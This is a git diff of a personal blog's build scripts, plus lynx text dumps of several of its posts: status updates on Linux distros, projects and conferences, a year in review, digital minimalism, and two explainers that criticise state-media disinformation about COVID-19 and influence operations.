@@ -3,7 +3,6 @@ 
 # from the pure sh bible; see: 
 # https://github.com/dylanaraps/pure-sh-bible#get-the-base-name-of-a-file-path
 
-mkdir -p build/txt
 for p in build/blog/**/index.html; do
     ppath="${p%%\/index.html}"
     pname="${ppath##build\/blog\/}"
@@ -14,7 +13,7 @@ sed -e '29,34d' "$p" > "$temp"
     cat "$temp" | awk -v OFS='\n\n' '/class="muted"/{n=3}; n {n--; next;} 1' > "$temp.new"
     mv "$temp.new" "$temp"
 
-    txt="build/txt/$pname.txt"
+    txt="pages/txt/$pname.txt"
     lynx -dump "$temp" | tail -n +1 > "$txt"
     rm "$temp"
     sed -i 's/file:\/\/\//https:\/\/icyphox\.sh\//' "$txt"

@@ -1,6 +1,5 @@ 
 #!/bin/sh
 
-apt install lynx
 rm -rf go-vite
 git clone https://github.com/icyphox/go-vite
 cd go-vite && make && cd ..

@@ -0,0 +1,69 @@ 
+   17 September, 2019
+
+Weekly status update, 09/08-09/17
+
+A brief on what happened last week
+
+   This is something new I'm trying out, in an effort to write more
+   frequently and to serve as a log of how I'm using my time. In theory, I
+   will write this post every week. I'll need someone to hold me
+   accountable if I don't. I have yet to decide on a format for this, but
+   it will probably include a quick summary of the work I did, things I
+   read, IRL stuff, etc.
+
+   With the meta stuff out of the way, here's what went down last week!
+
+My discovery of the XXIIVV webring
+
+   Did you notice the new fidget-spinner-like logo at the bottom? Click
+   it! It's a link to the [1]XXIIVV webring. I really like the idea of
+   webrings. It creates a small community of sites and enables sharing of
+   traffic among these sites. The XXIIVV webring consists mostly of
+   artists, designers and developers and gosh, some of those sites are
+   beautiful. Mine pales in comparison.
+
+   The webring also has a [2]twtxt echo chamber aptly called [3]The
+   Hallway. twtxt is a fantastic project and its complexity-to-usefulness
+   ratio greatly impresses me. You can find my personal twtxt feed at
+   /twtxt.txt (root of this site).
+
+   Which brings me to the next thing I did this/last week.
+
+twsh: a twtxt client written in Bash
+
+   I'm not a fan of the official Python client, because you know, Python
+   is bloat. As an advocate of mnmlsm, I can't use it in good conscience.
+   Thus, began my authorship of a truly mnml client in pure Bash. You can
+   find it [4]here. It's not entirely useable as of yet, but it's
+   definitely getting there, with the help of [5]@nerdypepper.
+
+Other
+
+   I have been listening to my usual podcasts: Crime Junkie, True Crime
+   Garage, Darknet Diaries & Off the Pill. To add to this list, I've begun
+   binging Vice's CYBER. It's pretty good -- each episode is only about 30
+   mins and it hits the sweet spot, delvering both interesting security
+   content and news.
+
+   My reading needs a ton of catching up. Hopefully I'll get around to
+   finishing up "The Unending Game" this week. And then go back to
+   "Terrorism and Counterintelligence".
+
+   I've begun learning Russian! I'm really liking it so far, and it's been
+   surprisingly easy to pick up. Learning the Cyrillic script will require
+   some relearning, especially with letters like v, n, r, s, etc. that
+   look like English but sound entirely different. I think I'm pretty
+   serious about learning this language -- I've added the Russian keyboard
+   to my Google Keyboard to aid in my familiarization of the alphabet.
+   I've added the RU layout to my keyboard map too:
+setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru
+
+   With that ends my weekly update, and I'll see you next week!
+
+References
+
+   1. https://webring.xxiivv.com/
+   2. https://github.com/buckket/twtxt
+   3. https://webring.xxiivv.com/hallway.html
+   4. https://github.com/icyphox/twsh
+   5. https://nerdypepper.me/

@@ -0,0 +1,85 @@ 
+   27 September, 2019
+
+Weekly status update, 09/17-09/27
+
+Alpine Linux shenaningans and more
+
+   It's a lazy Friday afternoon here; yet another off day this week thanks
+   to my uni's fest. My last "weekly" update was 10 days ago, and a lot
+   has happened since then. Let's get right into it!
+
+My switch to Alpine
+
+   Previously, I ran Debian with Buster/Sid repos, and ever since this
+   happened
+$ dpkg --list | wc -l
+3817
+
+# or something in that ballpark
+
+   I've been wanting to reduce my system's package count.
+
+   Thus, I began my search for a smaller, simpler and lighter distro with
+   a fairly sane package manager. I did come across Dylan Araps' [1]KISS
+   Linux project, but it seemed a little too hands-on for me (and still
+   relatively new). I finally settled on [2]Alpine Linux. According to
+   their website:
+
+     Alpine Linux is a security-oriented, lightweight Linux distribution
+     based on musl libc and busybox.
+
+   The installation was a breeze, and I was quite surprised to see WiFi
+   working OOTB. In the past week of my using this distro, the only major
+   hassle I faced was getting my Minecraft launcher to run. The JRE isn't
+   fully ported to musl yet.^[3]1 The solution to that is fairly trivial
+   and I plan to write about it soon. (hint: it involves chroots)
+
+   rice
+
+Packaging for Alpine
+
+   On a related note, I've been busy packaging some of the stuff I use for
+   Alpine -- you can see my personal [4]aports repository if you're
+   interested. I'm currently working on packaging Nim too, so keep an eye
+   out for that in the coming week.
+
+Talk selection at PyCon India!
+
+   Yes! My buddy Raghav ([5]@_vologue) and I are going to be speaking at
+   PyCon India about our recent smart lock security research. The
+   conference is happening in Chennai, much to our convenience. If you're
+   attending too, hit me up on Twitter and we can hang!
+
+Other
+
+   That essentially sums up the technical stuff that I did. My Russian is
+   going strong, my reading however, hasn't. I have yet to finish those
+   books! This week, for sure.
+
+   Musically, I've been experimenting. I tried a bit of hip-hop and
+   chilltrap, and I think I like it? I still find myself coming back to
+   metalcore/deathcore. Here's a list of artists I discovered (and liked)
+   recently:
+     * [6]Before I Turn
+     * Conform » (couldn't find any official YouTube video, check Spotify)
+     * [7]Treehouse Burning
+     * [8]Lee McKinney
+     * [9]Berried Alive (rediscovered)
+
+   That's it for now, I'll see you next week!
+     __________________________________________________________________
+
+    1. The [10]Portola Project
+
+References
+
+   1. https://getkiss.org/
+   2. https://alpinelinux.org/
+   3. https://icyphox.sh/home/icy/leet/site/build/blog/2019-09-27/temp.html#fn:1
+   4. https://github.com/icyphox/aports
+   5. https://twitter.com/_vologue
+   6. https://www.youtube.com/watch?v=r3uKGwcwGWA
+   7. https://www.youtube.com/watch?v=66eFK1ttdC4
+   8. https://www.youtube.com/watch?v=m-w3XM2PwOY
+   9. https://www.youtube.com/watch?v=cUibXK7F3PM
+  10. https://aboullaite.me/protola-alpine-java/

@@ -0,0 +1,73 @@ 
+   16 October, 2019
+
+Status update
+
+Not weekly anymore, but was it ever?
+
+   I've decided to drop the "Weekly" part of the status update posts,
+   since they were never weekly and -- let's be honest---they aren't going
+   to be. These posts are, henceforth, just "Status updates". The date
+   range can be inferred from the post date.
+
+   That said, here's what I've been up to!
+
+Void Linux
+
+   Yes, I decided to ditch Alpine in favor of Void. Alpine was great,
+   really. The very comfy apk, ultra mnml system... but having to maintain
+   a chroot for my glibc needs was getting way too painful. And the
+   package updates are so slow! Heck, they're still on kernel 4.xx on
+   their supposed "bleeding" edge repo.
+
+   So yes, Void Linux it is. Still a very clean system. I'm loving it. I
+   also undervolted my system using [1]undervolt (-95 mV). Can't say for
+   sure if there's a noticeable difference in battery life though. I'll
+   see if I can run some tests.
+
+   This should be the end of my distro hopping. Hopefully.
+
+PyCon
+
+   Yeah yeah, enough already. Read [2]my previous post.
+
+This website
+
+   I've moved out of GitHub Pages over to Netlify. This isn't my first
+   time using Netlify, though. I used to host my old blog which ran Hugo,
+   there. I was tired of doing this terrible hack to maintain a single
+   repo for both my source (master) and deploy (gh-pages). In essence,
+   here's what I did:
+#!/usr/bin/env bash
+
+git push origin master
+# push contents of `build/` to the `gh-pages` branch
+git subtree push --prefix build origin gh-pages
+
+   I can now simply push to master, and Netlify generates a build for me
+   by installing [3]vite, and running vite build. Very pleasant.
+
+mnmlwm's status
+
+   [4]mnmlwm, for those unaware, is my pet project which aims to be a
+   simple window manager written in Nim. I'd taken a break from it for a
+   while because Xlib is such a pain to work with (or I'm just dense).
+   Anyway, I'm planning on getting back to it, with some fresh inspiration
+   from Dylan Araps' [5]sowm.
+
+Other
+
+   I've been reading a lot of manga lately. Finished Kekkon Yubiwa
+   Monogatari (till the latest chapter) and Another, and I've just started
+   Kakegurui. I'll reserve my opinions for when I update the [6]reading
+   log.
+
+   That's about it, and I'll see you -- definitely not next week.
+
+References
+
+   1. https://github.com/georgewhewell/undervolt
+   2. https://icyphox.sh/blog/pycon-wrap-up
+   3. https://github.com/icyphox/vite
+   4. https://github.com/minimalwm/minimal
+   5. https://github.com/dylanaraps/sowm
+   6. https://icyphox.sh/reading

@@ -0,0 +1,80 @@ 
+   16 November, 2019
+
+Status update
+
+Exams, stuff, etc.
+
+   This month is mostly just unfun stuff, lined up in a neat schedule --
+   exams. I get all these cool ideas for things to do, and it's always
+   during exams. Anyway, here's a quick update on what I've been up to.
+
+Blog post queue
+
+   I realized that I could use this site's [1]repo's issues to track blog
+   post ideas. I've made a few, mostly just porting them over from my
+   Google Keep note.
+
+   This method of using issues is great, because readers can chime in with
+   ideas for things I could possibly discuss -- like in [2]this issue.
+
+Contemplating a vite rewrite
+
+   [3]vite, despite what the name suggests -- is awfully slow. Also,
+   Python is bloat. Will rewriting it fix that? That's what I plan to find
+   out. I have a couple of choices of languages to use in the rewrite:
+     * C: Fast, compiled. Except I suck at it. (cite?)
+     * Nim: My favourite, but I'll have to write bindings to
+       [4]lowdown(1). (nite?)
+     * Shell: Another favourite, muh "minimalsm". No downside, really.
+       (shite?)
+
+   Oh, and did I mention -- I want it to be compatible with vite. I don't
+   want to have to redo my site structure or its templates. At the moment,
+   I rely on Jinja2 for templating, so I'll need something similar.
+
+IRC bot
+
+   My earlier post on [5]IRC for DMs got quite a bit of traction, which
+   was pretty cool. I didn't really talk much about the bot itself though;
+   I'm dedicating this section to [6]detotated.^[7]1
+
+   Fairly simple Python code, using plain sockets. So far, we've got a few
+   basic features in place:
+     * .np command: queries the user's last.fm to get the currently
+       playing track
+     * Fetches the URL title, when a URL is sent in chat
+
+   That's it, really. I plan to add a .nps, or "now playing Spotify"
+   command, since we share Spotify links pretty often.
+
+Other
+
+   I've been reading some more manga, I'll update the [8]reading log when
+   I, well... get around to it. Haven't had time to do much in the past
+   few weeks -- the time at the end of a semester tends to get pretty
+   tight. Here's what I plan to get back to during this winter break:
+     * Russian!
+     * Window manager in Nim
+     * vite rewrite, probably
+     * The other blog posts in queue
+
+   I've also put off doing any "security work" for a while now, perhaps
+   that'll change this December. Or whenever.
+
+   With that ends my status update, on all things that I haven't done.
+     __________________________________________________________________
+
+    1. [9]https://knowyourmeme.com/memes/dedotated-wam (dead meme, yes I
+       know)
+
+References
+
+   1. https://github.com/icyphox/site
+   2. https://github.com/icyphox/site/issues/10
+   3. https://github.com/icyphox/vite
+   4. https://github.com/kristapsdz/lowdown
+   5. https://icyphox.sh/blog/irc-for-dms
+   6. https://github.com/icyphox/detotated
+   7. https://icyphox.sh/home/icy/leet/site/build/blog/2019-11-16/temp.html#fn:1
+   8. https://icyphox.sh/reading
+   9. https://knowyourmeme.com/memes/dedotated-wam

@@ -0,0 +1,85 @@ 
+   02 January, 2020
+
+2019 in review
+
+A look back at last year
+
+   Just landed in a rainy Chennai, back in campus for my 6th semester. A
+   little late to the "year in review blog post" party; travel took up
+   most of my time. Last year was pretty eventful (at least in my books),
+   and I think I did a bunch of cool stuff -- let's see!
+
+Interning at SecureLayer7
+
+   Last summer, I interned at [1]SecureLayer7, a security consulting firm
+   in Pune, India. My work was mostly in hardware and embededded security
+   research. I learnt a ton about ARM and MIPS reversing and exploitation,
+   UART and JTAG, firmware RE and enterprise IoT security.
+
+   I also earned my first CVE! I've written about it in detail [2]here.
+
+Conferences
+
+   I attended two major conferences last year -- Nullcon Goa and PyCon
+   India. Both super fun experiences and I met a ton of cool people!
+   [3]Nullcon Twitter thread and [4]PyCon blog post.
+
+Talks
+
+   I gave two talks last year:
+    1. Intro to Reverse Engineering at Cyware 2019
+    2. "Smart lock? Nah dude." at PyCon India
+
+Things I made
+
+   Not in order, because I CBA:
+     * [5]repl: More of a quick bash hack, I don't really use it.
+     * [6]pw: A password manager. This, I actually do use. I've even
+       written a tiny [7]dmenu wrapper for it.
+     * [8]twsh: An incomplete twtxt client, in bash. I have yet to get
+       around to finishing it.
+     * [9]alpine ports: My APKBUILDs for Alpine.
+     * [10]detotated: An IRC bot written in Python. See [11]IRC for DMs.
+     * [12]icyrc: A no bullshit IRC client, because WeeChat is bloat.
+
+   I probably missed something, but whatever.
+
+Blog posts
+
+$ ls -1 pages/blog/*.md | wc -l
+20
+
+   So excluding today's post, and _index.md, that's 18 posts! I had
+   initially planned to write one post a month, but hey, this is great. My
+   plan for 2020 is to write one post a week -- unrealistic, I know, but I
+   will try nevertheless.
+
+   I wrote about a bunch of things, ranging from programming to
+   return-oriented-programming (heh), sysadmin and security stuff, and a
+   hint of culture and philosophy. Nice!
+
+   The [13]Python for Reverse Engineering post got a ton of attention on
+   the interwebz, so that was cool.
+
+Bye 2019
+
+   2019 was super productive! (in my terms). I learnt a lot of new things
+   last year, and I can only hope to learn as much in 2020. :)
+
+   I'll see you next week.
+
+References
+
+   1. https://securelayer7.net/
+   2. https://icyphox.sh/blog/fb50
+   3. https://twitter.com/icyphox/status/1101022604851212288
+   4. https://icyphox.sh/blog/pycon-wrap-up
+   5. https://github.com/icyphox/repl
+   6. https://github.com/icyphox/pw
+   7. https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh
+   8. https://github.com/icyphox/twsh
+   9. https://github.com/icyphox/alpine
+  10. https://github.com/icyphox/detotated
+  11. https://icyphox.sh/blog/irc-for-dms
+  12. https://github.com/icyphox/icyrc
+  13. https://icyphox.sh/blog/python-for-re-1

@@ -0,0 +1,81 @@ 
+   18 January, 2020
+
+Status update
+
+New year...new stuff?
+
+   It's only been a two weeks since I got back to campus, and we've
+   already got our first round of cycle tests starting this Tuesday.
+   Granted, I returned a week late, but...that's nuts!
+
+   We're two whole weeks into 2020; I should've been working on something
+   status update worthy, right? Not really, but we'll see.
+
+No more Cloudflare!
+
+   Yep. If you weren't aware -- pre-2020 this site was behind Cloudflare
+   SSL and their DNS. I have since migrated off it to [1]he.net, thanks to
+   highly upvoted Lobste.rs comment. Because of this switch, I infact,
+   learnt a ton about DNS.
+
+   Migrating to HE was very painless, but I did have to research a lot
+   about PTR records -- Cloudflare kinda dumbs it down. In my case, I had
+   to rename my DigitalOcean VPS instance to the FQDN, which then
+   automagically created a PTR record at DO's end.
+
+I dropped icyrc
+
+   The IRC client I was working on during the end of last
+   December--early-January? Yeah, I lost interest. Apparently writing C
+   and ncurses isn't very fun or stimulating.
+
+   This also means I'm back on weechat. Until I find another client that
+   plays well with ZNC, that is.
+
+KISS stuff
+
+   I now maintain two new packages in the KISS community repository --
+   2bwm and aerc! The KISS package system is stupid simple to work with.
+   Creating packages has never been easier.
+
+[2]icyphox.sh/friends
+
+   Did you notice that yet? I've been curating a list of people I know IRL
+   and online, and linking to their online presence. This is like a
+   webring of sorts, and promotes inter-site traffic -- making the web
+   more "web" again.
+
+   If you know me, feel free to [3]hit me up and I'll link your site too!
+   My apologies if I've forgotten your name.
+
+Patreon!
+
+   Is this big news? I dunno, but yes -- I now have a Patreon. I figured
+   I'd cash in on the newfound traffic my site's been getting. There won't
+   be any exclusive content or any tiers or whatever. Nothing will change.
+   Just a place for y'all to toss me some $$$ if you wish to do so. ;)
+
+   Oh, and it's at [4]patreon.com/icyphox.
+
+Misc.
+
+   The Stormlight Archive is likely the best epic I have ever read till
+   date. I'm still not done yet; about 500 odd pages to go as of this
+   writing. But wow, Brandon really does know how to build worlds and
+   magic systems. I cannot wait to read all about the [5]cosmere.
+
+   I have also been working out for the past month or so. I can see them
+   gainzzz. I plan to keep track of my progress, I just don't know how to
+   quantify it. Perhaps I'll log the number of reps × sets I do each time,
+   and with what weights. I can then look back to see if either the
+   weights have increased since, or the number of reps × sets have. If you
+   know of a better way to quantify progress, let me know! I'm pretty new
+   to this.
+
+References
+
+   1. https://he.net/
+   2. https://icyphox.sh/friends
+   3. https://icyphox.sh/about#contact
+   4. https://patreon.com/icyphox
+   5. https://coppermind.net/wiki/Cosmere

@@ -0,0 +1,33 @@ 
+   20 July, 2020
+
+Status update
+
+Things I've been up to, for the past month-ish
+
+   I realize I haven't updated this site in a while -- mostly due to lack
+   of time. The past two weeks have been pretty busy (read: I now actually
+   have work to do), which also means I have very little time to devote to
+   personal projects. Anyway, on with the update.
+
+I now work at CometChat
+
+   I've begun working as an Engineering Intern at [1]CometChat. It's been
+   a very interesting experience so far. Most of my work revolves around
+   infrastructure and platform engineering -- pretty exciting stuff.
+   [Oops, redacted]
+
+   I have also been extensively dabbling in XMPP and websocket internals,
+   as I'm writing a websocket proxy of sorts. I'll probably talk about it
+   in a future blog post, once I get approval org-side. :^)
+
+that's literally it
+
+   I sat all day thinking of what else to add to this post -- there's got
+   to be something else right? Not really. I don't think I did anything
+   worthwhile. I did get some pretty interesting emails from people who
+   read this blog, so yes, please email me -- even if it's just to say hi.
+   I always reply.
+
+References
+
+   1. https://www.cometchat.com/

@@ -0,0 +1,94 @@ 
+   15 March, 2020
+
+COVID-19 disinformation
+
+A lot of actors cashing in on the epidemic
+
+   The virus spreads around the world, along with a bunch of
+   disinformation and potential malware / phishing campaigns. There are
+   many actors, pushing many narratives -- some similar, some different.
+
+   Interestingly, the three big players in the information warfare space
+   -- Russia, Iran and China seem to be running similar stories on their
+   state-backed media outlets. While they all tend to lean towards the
+   same, fairly anti-U.S. sentiments -- that is, blaming the US for
+   weaponizing the crisis for political gain -- Iran and Russia's content
+   come off as more...conspiratorial. In essence, they claim that the
+   COVID-19 virus is a "bioweapon" developed by the U.S.
+
+   Russian news agency [1]RT tweeted:
+
+     Show of hands, who isn't going to be surprised if it ever gets
+     revealed that #coronavirus is a bioweapon?
+
+   RT also published [2]an article mocking the U.S. for concerns over
+   Russian disinformation. Another article by RT, [3]an op-ed suggests the
+   virus' impact on financial markets might bring about the reinvention of
+   communism and the end of the global capitalist system. Russian
+   state-sponsored media can also be seen amplifying Iranian conspiracy
+   theories -- including the Islamic Revolutionary Guard Corps' (IRGC)
+   suggestion that COVID-19 [4]is a U.S. bioweapon.
+
+   Iranian media outlets appear to be running stories having similar
+   themese, as well. Here's one [5]by PressTV, where they very boldly
+   claim that the virus was developed by the U.S. and/or Isreal, to use as
+   a bioweapon against Iran. Another [6]nonsensical piece by PressTV
+   suggests that "there are components of the virus that are related to
+   HIV that could not have occurred naturally". The same article pushes
+   another theory:
+
+     There has been some speculation that as the Trump Administration has
+     been constantly raising the issue of growing Chinese global
+     competitiveness as a direct threat to American national security and
+     economic dominance, it might be possible that Washington has created
+     and unleashed the virus in a bid to bring Beijing's growing economy
+     and military might down a few notches. It is, to be sure, hard to
+     believe that even the Trump White House would do something so
+     reckless, but there are precedents for that type of behavior
+
+   These "theories", as is evident, are getting wilder and wilder.
+
+   Unsurprisingly, China produces the most amount of content related to
+   the coronavirus, but they're quite distinct in comparison to Russian
+   and Iranian media. The general theme behind Chinese narratives is
+   critisizing the West for...a lot of things.
+
+   Global Times claims that [7]democracy is an insufficient system to
+   battle the coronavirus. They [8]blame the U.S. for unfair media
+   coverage against China, and other [9]anti-China narratives. There are a
+   ton other articles that play the racism/discrimination card -- I
+   wouldn't blame them though. [10]Here's one.
+
+   In the case of India, most disinfo (actually, misinfo) is mostly just
+   pseudoscientific / alternative medicine / cures in the form of WhatsApp
+   forwards -- "Eat foo! Eat bar!".^[11]1
+
+   I've also been noticing a ton of COVID-19 / coronavirus related domain
+   registrations happening. Expect phishing and malware campaigns using
+   the virus as a theme. In the past 24 hrs, ~450 .com domains alone were
+   registered.
+
+   corona domains
+
+   Anywho, there are bigger problems at hand -- like the fact that my uni
+   still hasn't suspended classes!
+     __________________________________________________________________
+
+    1. [12]https://www.thehindu.com/news/national/coronavirus-group-hosts-
+       cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ec
+       e
+
+References
+
+   1. https://twitter.com/RT_com/status/1233187558793924608
+   2. https://www.rt.com/usa/481485-coronavirus-russia-state-department/
+   3. https://www.rt.com/op-ed/481831-coronavirus-kill-bill-capitalism-communism/
+   4. https://www.rt.com/news/482405-iran-coronavirus-us-biological-weapon/
+   5. https://www.presstv.com/Detail/2020/03/05/620217/US-coronavirus-James-Henry-Fetzer
+   6. https://www.presstv.com/Detail/2020/03/05/620213/Coronavirus-was-produced-in-a-laboratory
+   7. http://www.globaltimes.cn/content/1178494.shtml
+   8. http://www.globaltimes.cn/content/1178494.shtml
+   9. http://www.globaltimes.cn/content/1180630.shtml
+  10. http://www.globaltimes.cn/content/1178465.shtml
+  11. https://icyphox.sh/home/icy/leet/site/build/blog/covid19-disinfo/temp.html#fn:cowpiss
+  12. https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece

@@ -0,0 +1,63 @@ 
+   05 October, 2019
+
+Thoughts on digital minimalism
+
+Put that screen down!
+
+   Ah yes, yet another article on the internet on this beaten to death
+   subject. But this is inherently different, since it's my opinion on the
+   matter, and my technique(s) to achieve "digital minimalism".
+
+   According to me, minimalism can be achieved on two primary fronts --
+   the phone & the computer. Let's start with the phone. The daily carry.
+   The device that's on our person from when we get out of bed, till we
+   get back in bed.
+
+The phone
+
+   I've read about a lot of methods people employ to curb their phone
+   usage. Some have tried grouping "distracting" apps into a separate
+   folder, and this supposedly helps reduce their usage. Now, I fail to
+   see how this would work, but YMMV. Another technique I see often is
+   using a time governance app -- like OnePlus' Zen Mode---to enforce how
+   much time you spend using specific apps, or the phone itself. I've
+   tried this for myself, but I constantly found myself counting down the
+   minutes after which the phone would become usable again. Not helpful.
+
+   My solution to this is a lot more brutal. I straight up uninstalled the
+   apps that I found myself using too often. There's a simple principle
+   behind it -- if the app has a desktop alternative, like Twitter,
+   Reddit, etc. use that instead. Here's a list of apps that got nuked
+   from my phone:
+     * Twitter
+     * Instagram (an exception, no desktop client)
+     * Relay for Reddit
+     * YouTube (disabled, ships with stock OOS)
+
+   The only non-productive app that I've let remain is Clover, a 4chan
+   client. I didn't find myself using it as much earlier, but we'll see
+   how that holds up. I've also allowed my personal messaging apps to
+   remain, since removing those would be inconveniencing others.
+
+   I must admit, I often find myself reaching for my phone out of habit
+   just to check Twitter, only to find that its gone. I also
+   subconsciously tap the place where its icon used to exist (now replaced
+   with my mail client) on my launcher. The only "fun" thing left on my
+   phone to do is read or listen to music. Which is okay, in my opinion.
+
+The computer
+
+   I didn't do anything too nutty here, and most of the minimalism is
+   mostly aesthetic. I like UIs that get out of the way.
+
+   My setup right now is just a simple bar at the top showing the time,
+   date, current volume and battery %, along with my workspace indicators.
+   No fancy colors, no flashy buttons and sliders. And that's it. I don't
+   try to force myself to not use stuff -- after all, I've reduced it
+   elsewhere. :)
+
+   Now the question arises: Is this just a phase, or will I stick to it?
+   What's going to stop me from heading over to the Play Store and
+   installing those apps back? Well, I never said this was going to be
+   easy. There's definitely some will power needed to pull this off. I
+   guess time will tell.

@@ -0,0 +1,190 @@ 
+   10 September, 2019
+
+Disinformation demystified
+
+Misinformation, but deliberate
+
+   As with the disambiguation of any word, let's start with its etymology
+   and definiton. According to [1]Wikipedia, disinformation has been
+   borrowed from the Russian word -- dezinformatisya (dezinforma'ciya),
+   derived from the title of a KGB black propaganda department.
+
+     Disinformation is false information spread deliberately to deceive.
+
+   To fully understand disinformation, especially in the modern age, we
+   need to understand the key factors of any successful disinformation
+   operation:
+     * creating disinformation (what)
+     * the motivation behind the op, or its end goal (why)
+     * the medium used to disperse the falsified information (how)
+     * the actor (who)
+
+   At the end, we'll also look at how you can use disinformation
+   techniques to maintain OPSEC.
+
+   In order to break monotony, I will also be using the terms "information
+   operation", or the shortened forms -- "info op" & "disinfo".
+
+Creating disinformation
+
+   Crafting or creating disinformation is by no means a trivial task.
+   Often, the quality of any disinformation sample is a huge indicator of
+   the level of sophistication of the actor involved, i.e. is it a 12 year
+   old troll or a nation state?
+
+   Well crafted disinformation always has one primary characteristic --
+   "plausibility". The disinfo must sound reasonable. It must induce the
+   notion it's likely true. To achieve this, the target -- be it an
+   individual, a specific demographic or an entire nation -- must be well
+   researched. A deep understanding of the target's culture, history,
+   geography and psychology is required. It also needs circumstantial and
+   situational awareness, of the target.
+
+   There are many forms of disinformation. A few common ones are staged
+   videos / photographs, recontextualized videos / photographs, blog
+   posts, news articles & most recently -- deepfakes.
+
+   Here's a tweet from [2]the grugq, showing a case of recontextualized
+   imagery:
+
+     Disinformation.
+     The content of the photo is not fake. The reality of what it
+     captured is fake. The context it's placed in is fake. The picture
+     itself is 100% authentic. Everything, except the photo itself, is
+     fake.
+     Recontextualisation as threat vector. [3]pic.twitter.com/Pko3f0xkXC
+     — thaddeus e. grugq (@thegrugq) [4]June 23, 2019
+
+Motivations behind an information operation
+
+   I like to broadly categorize any info op as either proactive or
+   reactive. Proactively, disinformation is spread with the desire to
+   influence the target either before or during the occurence of an event.
+   This is especially observed during elections.^[5]1 In offensive
+   information operations, the target's psychological state can be
+   affected by spreading fear, uncertainty & doubt, or FUD for short.
+
+   Reactive disinformation is when the actor, usually a nation state in
+   this case, screws up and wants to cover their tracks. A fitting example
+   of this is the case of Malaysian Airlines Flight 17 (MH17), which was
+   shot down while flying over eastern Ukraine. This tragic incident has
+   been attributed to Russian-backed separatists.^[6]2 Russian media is
+   known to have desseminated a number of alternative & some even
+   conspiratorial theories^[7]3, in response. The number grew as the JIT's
+   (Dutch-lead Joint Investigation Team) investigations pointed towards
+   the separatists. The idea was to muddle the information space with
+   these theories, and as a result, potentially correct information takes
+   a credibility hit.
+
+   Another motive for an info op is to control the narrative. This is
+   often seen in use in totalitarian regimes; when the government decides
+   what the media portrays to the masses. The ongoing Hong Kong protests
+   is a good example.^[8]4 According to [9]NPR:
+
+     Official state media pin the blame for protests on the "black hand"
+     of foreign interference, namely from the United States, and what
+     they have called criminal Hong Kong thugs. A popular conspiracy
+     theory posits the CIA incited and funded the Hong Kong protesters,
+     who are demanding an end to an extradition bill with China and the
+     ability to elect their own leader. Fueling this theory, China Daily,
+     a state newspaper geared toward a younger, more cosmopolitan
+     audience, this week linked to a video purportedly showing Hong Kong
+     protesters using American-made grenade launchers to combat police.
+     ...
+
+Media used to disperse disinfo
+
+   As seen in the above example of totalitarian governments, national TV
+   and newspaper agencies play a key role in influence ops en masse. It
+   guarantees outreach due to the channel/paper's popularity.
+
+   Twitter is another, obvious example. Due to the ease of creating
+   accounts and the ability to generate activity programmatically via the
+   API, Twitter bots are the go-to choice today for info ops. Essentially,
+   an actor attempts to create "discussions" amongst "users" (read: bots),
+   to push their narrative(s). Twitter also provides analytics for every
+   tweet, enabling actors to get realtime insights into what sticks and
+   what doesn't. The use of Twitter was seen during the previously
+   discussed MH17 case, where Russia employed its troll factory -- the
+   [10]Internet Research Agency (IRA) to create discussions about
+   alternative theories.
+
+   In India, disinformation is often spread via YouTube, WhatsApp and
+   Facebook. Political parties actively invest in creating group chats to
+   spread political messages and memes. These parties have volunteers
+   whose sole job is to sit and forward messages. Apart from political
+   propaganda, WhatsApp finds itself as a medium of fake news. In most
+   cases, this is disinformation without a motive, or the motive is hard
+   to determine simply because the source is impossible to trace, lost in
+   forwards.^[11]5 This is a difficult problem to combat, especially given
+   the nature of the target audience.
+
+The actors behind disinfo campaigns
+
+   I doubt this requires further elaboration, but in short:
+     * nation states and their intelligence agencies
+     * governments, political parties
+     * other non/quasi-governmental groups
+     * trolls
+
+   This essentially sums up the what, why, how and who of disinformation.
+
+Personal OPSEC
+
+   This is a fun one. Now, it's common knowledge that STFU is the best
+   policy. But sometimes, this might not be possible, because afterall
+   inactivity leads to suspicion, and suspicion leads to scrutiny. Which
+   might lead to your OPSEC being compromised. So if you really have to,
+   you can feign activity using disinformation. For example, pick a place,
+   and throw in subtle details pertaining to the weather, local events or
+   regional politics of that place into your disinfo. Assuming this is
+   Twitter, you can tweet stuff like:
+     * "Ugh, when will this hot streak end?!"
+     * "Traffic wonky because of the Mardi Gras parade."
+     * "Woah, XYZ place is nice! Especially the fountains by ABC street."
+
+   Of course, if you're a nobody on Twitter (like me), this is a non-issue
+   for you.
+
+   And please, don't do this:
+
+   mcafee opsecfail
+
+Conclusion
+
+   The ability to influence someone's decisions/thought process in just
+   one tweet is scary. There is no simple way to combat disinformation.
+   Social media is hard to control. Just like anything else in cyber, this
+   too is an endless battle between social media corps and motivated
+   actors.
+
+   A huge shoutout to Bellingcat for their extensive research in this
+   field, and for helping folks see the truth in a post-truth world.
+     __________________________________________________________________
+
+    1. [12]This episode of CYBER talks about election influence ops
+       (features the grugq!).
+    2. The [13]Bellingcat Podcast's season one covers the MH17
+       investigation in detail.
+    3. [14]Wikipedia section on MH17 conspiracy theories
+    4. [15]Chinese newspaper spreading disinfo
+    5. Use an adblocker before clicking [16]this.
+
+References
+
+   1. https://en.wikipedia.org/wiki/Disinformation
+   2. https://twitter.com/thegrugq
+   3. https://t.co/Pko3f0xkXC
+   4. https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw
+   5. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:1
+   6. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:2
+   7. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:3
+   8. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:4
+   9. https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests
+  10. https://en.wikipedia.org/wiki/Internet_Research_Agency
+  11. https://icyphox.sh/home/icy/leet/site/build/blog/disinfo/temp.html#fn:5
+  12. https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked
+  13. https://www.bellingcat.com/category/resources/podcasts/
+  14. https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories
+  15. https://twitter.com/gdead/status/1171032265629032450
+  16. https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html

@@ -0,0 +1,69 @@ 
